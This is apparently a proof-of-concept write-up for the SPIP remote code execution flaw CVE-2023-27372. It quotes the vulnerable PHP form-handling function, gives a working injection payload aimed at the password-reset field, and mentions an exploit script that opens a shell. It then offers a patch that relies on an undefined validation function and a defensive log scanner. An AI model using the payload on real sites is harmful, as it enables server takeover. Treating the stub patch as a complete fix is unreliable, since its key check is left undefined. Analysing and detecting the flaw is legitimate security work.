CVE-2023-27372 PoC: SPIP security vulnerability

Title: SPIP security vulnerability (CVE-2023-27372)
Description: SPIP is free software for creating Internet sites. Versions of SPIP before 4.2.1 contain a security vulnerability caused by improper serialization handling; an attacker can exploit it to execute code remotely.
Description
This is a PoC for CVE-2023-27372 and spawns a fully interactive shell.
Introduction

### This is a proof of concept for the CVE-2023-27372 SPIP RCE vulnerability.

Syntax: `python3 exploit.py -u http(s)://url.com`

It's a deserialization flaw stemming from the dangerous use of the `#ENV` tag in the password reset feature (`spip.php?page=spip_pass`); the vulnerable code lives in `/ecrire/balise/formulaire_.php`, specifically this function:

```php
function protege_champ($texte) {
	if (is_array($texte))
		$texte = array_map('protege_champ', $texte);
	else {
		// do not corrupt a serialized value
		// (any user input matching this prefix is returned without escaping)
		if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte) != false)
			return $texte;
		$texte = entites_html($texte);
		$texte = str_replace("'", "&#39;", $texte);
	}
	return $texte;
}
```

The `protege_champ` function suffers from various flaws. The regular expression (RE) check used to validate the input is flawed and can be bypassed easily. The code calls the `unserialize()` function without proper validation, allowing the execution of arbitrary code. Manual exploitation can be performed extremely easily. For example, if we wanted to execute `phpinfo();` we can do:

```text
oubli=s:19:"<?php phpinfo(); ?>";
```

If the server returns the expected output, it's vulnerable. How can we patch it? Fairly simply, actually. Below, I have written a basic patch:

```php
function protege_champ($texte) {
  if (is_array($texte)) {
    $texte = array_map('protege_champ', $texte);
  } else {
    // isValidInput() is not defined in this PoC; it stands for the author's
    // input validation step that rejects values the field should never hold.
    if (!isValidInput($texte)) {
      $texte = 'Malicious input detected';
    } else {
      $texte = entites_html($texte);
      $texte = str_replace("'", "&#39;", $texte);
    }
  }
  return $texte;
}
```
The patched `protege_champ()` function includes input validation, sanitization, and handling of malicious input. 
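Added here as a defender-side companion to the patch (example code, not part of this PoC or of SPIP): a Python scanner over constructed request records that flags form fields shaped like the serialized values `protege_champ()` passes through unescaped, and escalates when such a field also carries a PHP open tag. The log record format and the field names other than `oubli` and `page=spip_pass` are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The prefix protege_champ() accepts as "a serialized value" (its regex, minus
# the PCRE delimiters); anything shaped like this is returned unescaped.
SERIALIZED_PREFIX = re.compile(r"^[abis]:\d+[:;]")
# A PHP open tag inside such a field is what turns the pass-through into RCE.
PHP_OPEN_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)

# Constructed sample log: 'METHOD PATH<TAB>URL-encoded body', one request per line.
# Line 2 carries the page's phpinfo() payload; line 3 a bare serialized integer.
SAMPLE_LOG = [
    "POST /spip.php?page=spip_pass\toubli=alice%40example.org&nobot=",
    "POST /spip.php?page=spip_pass\toubli=s%3A19%3A%22%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%22%3B",
    "POST /spip.php?page=spip_pass\toubli=i%3A5%3B",
    "GET /spip.php?page=login\t",
]

def inspect_body(body):
    """Return (field, severity) for every form value shaped like a PHP serialized
    value: 'suspicious' on its own, 'exploit-attempt' if it also carries <?php."""
    findings = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if SERIALIZED_PREFIX.match(value):
                severity = "exploit-attempt" if PHP_OPEN_TAG.search(value) else "suspicious"
                findings.append((field, severity))
    return findings

def scan_log(lines):
    """Scan POST records and return (line_no, page, field, severity) findings."""
    results = []
    for n, line in enumerate(lines, 1):
        method, _, rest = line.partition(" ")
        path, _, body = rest.partition("\t")
        if method != "POST":
            continue
        page = parse_qs(urlsplit(path).query).get("page", ["?"])[0]
        for field, severity in inspect_body(body):
            results.append((n, page, field, severity))
    return results

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d page=%s field=%s %s" % hit)
```

Legitimate reset requests carry an e-mail address in `oubli`, which never matches the serialized prefix, so any hit on this form is worth an alert.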

<a href=https://twitter.com/redboltsec>Twitter</a>